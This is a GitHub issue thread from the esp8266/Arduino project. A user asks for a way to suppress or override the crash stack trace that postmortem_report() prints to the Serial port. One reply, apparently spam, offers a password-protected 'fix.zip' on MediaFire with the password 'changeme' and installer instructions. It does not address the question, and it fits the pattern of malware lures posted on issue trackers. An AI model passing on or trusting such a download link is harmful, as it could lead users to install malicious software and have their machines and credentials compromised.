esp8266/Arduino #9194: Feature Request: Don't print stack trace to Serial on crash

DRSDavidSoft, 2024-08-28:
### Basic Infos

- [x] This issue complies with the [issue POLICY doc](https://github.com/esp8266/Arduino/blob/master/POLICY.md).
- [x] I have read the documentation at [readthedocs](https://arduino-esp8266.readthedocs.io/en/latest) and the issue is not addressed there.
- [x] I have tested that the issue is present in current master branch (aka latest git).
- [x] I have searched the issue tracker for a similar issue.
- [N/A] If there is a stack dump, I have decoded it.
- [x] I have filled out all fields below.

#### Platform

- Hardware:				ESP8266
- Core Version:			3.1.2 (latest)
- Development Env:		VS Code + Microsoft Arduino Extension
- Operating System:		Windows

### Settings in IDE

- Module:  			Generic ESP8266 Module

### Problem Description

Hi there, I'm trying to change the behavior of the `postmortem_report()` call not to print anything to the Serial upon a crash. The serial port in question is connected to a peripherical and is not used for debugging purposes.

So far, my efforts in #9193 have been unsuccessful. I am unable to override the `postmortem_report()` call via my code.

This got me thinking, can you possibly please introduce a new flag that would prevent the default function from being defined, or avoid printing to the serial? Currently the `custom_crash_callback()` callback is called _after_ the `postmortem_report()` has finished printing to the Serial port.

The addition of this would be awesome.

Thank you for the project!

Gaurav9812, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

DRSDavidSoft, 2024-08-29:
It would be awesome if we could somehow override `postmortem_report()` completely.

DRSDavidSoft, 2025-08-17:
@mcspr, I would like to discuss implementing a way for the user to override `postmortem_report()`, which would make certain parts of #9196 unnecessary.

Could you please share your opinion on this?